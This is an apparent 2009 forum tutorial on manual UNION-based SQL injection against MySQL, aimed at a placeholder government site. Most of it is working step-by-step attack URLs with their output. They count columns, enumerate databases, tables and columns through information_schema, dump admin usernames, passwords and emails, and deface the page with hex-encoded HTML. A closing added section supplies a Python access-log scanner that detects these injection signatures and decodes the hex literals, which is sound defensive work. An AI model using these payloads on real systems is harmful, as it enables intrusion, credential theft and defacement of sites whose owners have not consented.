[Tutorial] Advanced SQL Injection
Posted: Sun Dec 13, 2009 11:46 am
This paper is the advanced follow-up to my first article. In this tutorial we will see how to get deeper into a website than usual using SQL injection.
1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check whether the site has the bug. We only need to add a single quote at the end of the URL, so the URL becomes:
http://www.victim.gov/agent_detail.php?aid=9'
and an error appears.
2. We check the number of columns of that site.
To check the number of columns we use "order by". Don't forget to add (-) after the = and (--) at the end of the URL.
URL:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear
Because the error appeared at "order by 6", the number of columns is 5. The formula is n-1, where n is the "order by" value at which the error first appears.
3. We check which number is exploitable (which column is echoed on the page).
We use "union all select".
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 comes from the number of columns; if the number of columns were 3, the query would be "union all select 1,2,3".
The number 3 appears on the page, so 3 is the exploitable number.
4. We check the version of that site.
We use "version()". We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and this appears:
5.0.45-community-nt. We are lucky: MySQL 5.0 and later expose information_schema, so we will be able to find the names of the databases, tables and columns.
5. We check the database user of that site.
We use "user()". We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and this appears:
root@localhost
so the username is root.
6. We check the default database.
We use "database()". We only need to replace the exploitable number with database().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and this appears: "news"
so the default database of that site is "news".
7. We list all databases on that site.
We use "concat(schema_name) from information_schema.schemata".
We need to replace the exploitable number with "concat(schema_name)" and add "from information_schema.schemata" at the end of the URL.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all databases on that site. Example:
news
information_schema
mysql
cms
connection
shop
etc
8. We check the table names of that site (default database).
This is the query to use if you want to see the table names of the default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()".
We need to replace the exploitable number with "concat(table_name)" and add "from information_schema.tables where table_schema=database()" at the end of the URL.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see the table names of that database. Example:
admin
config
news
etc
9. We check the column names of a table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]".
[hexa] is the result of converting the table name to hex. For example, the hex of "cms" is 636D73 and the hex of "admin" is 61646D696E.
If the table is "admin", the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the column names of that table. Example:
username
password
email
etc
10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name".
0x3a is the hex of ":"; it separates each dumped field. For example, we want to dump the table admin, columns username, password and email.
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
The structure:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email
We have learned how to dump from the default database. What about the other databases?
11. Check the table names of another database.
For example, the other database is "cms".
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]", where [hex] is the result of converting the database name to hex. Converting "cms" to hex gives 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user
12. Check the column names of one of those tables.
For example, the table is "cms_order".
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]".
The hex of "cms_order" is 636D735F6F72646572. So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff
13. Dump data from those columns.
For example, the column names are order_id and order_reff.
We use "concat(column_name_1,0x3a,column_name_2) from database.table" (note the comma on both sides of the 0x3a separator).
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3a,order_reff),4,5 from cms.cms_order--
You will see the data.
14. Fake deface using SQL injection
We only need to convert the HTML to hex.
Example: <marquee>xyberbreaker</marquee> in hex is 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace the exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good.
The end.
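From the defender's side, every stage above leaves a distinctive trace in the web server's access log: the quote probe, the "order by N" counting, the UNION, the information_schema lookups and the 0x hex literals that hide table names and HTML from naive quote filters. This added example (not from the original post) scans constructed Apache-style log lines for those signatures and decodes the hex literals so an analyst can see what was actually requested; the log lines, IP and timestamps are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the post) replaying the probing sequence above.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2009:11:46:01 +0000] "GET /agent_detail.php?aid=9 HTTP/1.1" 200 5120
203.0.113.5 - - [13/Dec/2009:11:46:03 +0000] "GET /agent_detail.php?aid=9%27 HTTP/1.1" 500 812
203.0.113.5 - - [13/Dec/2009:11:46:09 +0000] "GET /agent_detail.php?aid=-9%20order%20by%206-- HTTP/1.1" 500 812
203.0.113.5 - - [13/Dec/2009:11:46:20 +0000] "GET /agent_detail.php?aid=-9%20union%20all%20select%201,2,concat(column_name),4,5%20from%20information_schema.columns%20where%20table_name=0x61646D696E-- HTTP/1.1" 200 6011
203.0.113.5 - - [13/Dec/2009:11:46:31 +0000] "GET /agent_detail.php?aid=-9%20union%20all%20select%201,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5-- HTTP/1.1" 200 6011
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})\b")
# One signature per stage of the walkthrough: quote probe, ORDER BY counting,
# UNION extraction, information_schema lookups and the "--" comment terminator.
SIGNATURES = {
    "quote_probe": re.compile(r"'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}

def decode_hex_literals(value: str) -> list:
    """Recover strings hidden in 0x... literals (table names, injected HTML)."""
    decoded = []
    for digits in HEX_LITERAL_RE.findall(value):
        try:
            text = bytes.fromhex(digits).decode("ascii")
        except ValueError:  # odd digit count or non-ASCII bytes: not a string
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded

def analyse_line(line: str) -> "dict | None":
    """Decode the request's query parameters; None when nothing matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    signatures, decoded = [], []
    for _name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        signatures += [s for s, rx in SIGNATURES.items() if rx.search(value) and s not in signatures]
        decoded += decode_hex_literals(value)
    return {"target": m.group(1), "signatures": signatures, "decoded_hex": decoded} if signatures else None

def scan_log(text: str) -> list:
    """Return a finding for every suspicious line, tagged with its line number."""
    return [dict(line=n, **f) for n, l in enumerate(text.splitlines(), 1) if (f := analyse_line(l))]
```

Run `scan_log(SAMPLE_LOG)`: the benign request on line 1 produces nothing, while lines 2 to 5 are flagged with their stage and the decoded literals "admin" and "<marquee>xyberbreaker</marquee>".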
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANYTHING READERS DO.
"Whoever uses this for crime bears the sin themselves."
http://xyber-breaker.blogspot.com